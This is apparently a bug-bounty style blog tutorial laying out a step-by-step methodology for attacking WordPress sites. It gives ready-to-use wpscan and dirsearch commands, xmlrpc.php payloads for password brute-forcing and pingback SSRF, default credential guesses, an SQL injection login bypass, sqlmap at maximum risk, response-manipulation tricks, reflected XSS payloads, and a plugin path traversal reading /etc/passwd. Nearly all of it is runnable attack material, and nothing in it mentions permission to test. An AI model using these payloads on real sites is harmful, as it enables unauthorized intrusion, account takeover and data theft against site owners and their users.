Advanced level for WordPress Vulnerabilities
what to do if you discovered Wordpress CMS
great story would change your recon and exploiting methodology forever
ready lets go:
to discover wordpress there are many was but we are gonna use wapalyzer
after collecting wordpress sites then lets try to find vulnerabilities
first use wpscan but first you must register and take api from https://wpscan.com/register/
once you got the api and installed wpscan in your machine lets start
wpscan --url https://target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --forceyou are gonna see sentstive files and the version of wordpress moreover CVES and vulnerabilities , you should take the title of it and start searching for exploring it
if you found xmprpc.php file from wpscan you can exploit it by making dos attack or no rate limit on fuzzing the password or SSRF as follows but you must change the request method to post first
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
now lets try to fuzz the username and password without rate limit by intruder or turbo
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
once you reached the correct password the response would be like that
now let’s try SSRF via xmlrpc.php
replace burpcollab.net with your burpsuite collaborator and site.com with target site
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string> https://burpcollab.net </string></value>
</param><param><value><string> http://site.com
</string>
</value></param></params>
</methodCall>
another thing is fuzzing wordpress as you can find information disclosure
dirsearch -u https://target.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.jsonvia /wp-json/wp/v1/users or /wp-json/wp/v2/users
or /author-sitemap.xml
see this https://hackerone.com/reports/1784999
check also /wp- content/uploads/ and if 403 forbidden or not found 404 then try to bypass it by /wp-content/UPLOADS/ or /wp-content/UpLoAds/
see this https://www.ciel.org/wp-content/uploads/
try to search for registration page and if you didn’t find then try to do that
make post request with /register path and change the content-type from application/json to application/x-www-form-urlencoded and you can register or at least there is information disclosure
in the login page try first to check common credentials as admin:admin or admin:password or test:test or root:toor or admin:pa$$w0rd and if failed then check the rate limit if there is no rate limit then report it now as attacker can send the form to vps and fuzz the password easily in one day
now let’s try sql injection in login page in username and password forms
' OR 1=1;- -also you can intercept the login request with burpsuite and save the request in file as
after saving the file use sqlmap as
sqlmap -r request.txt --risk 3 --level 5 --random-agent you can also try response manipulation when login as if you failed to login and response like 403 Forbidden then change it to 200 OK and the body can be failed => change it to => succeeded
if you found admin-ajax.php then try xss
site.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5<%2Fscript><script>alert(document.domain)<%2Fscript>custom_name'%3A'Cairo'%2C'animated'%3A'true'}/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.pngand also try rce
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwduse this dork in shodan.io to discover senstive info
html:"you don't have to use the web site, you can"try to register via /wp-login.php?action=register
best regards,
hossam shady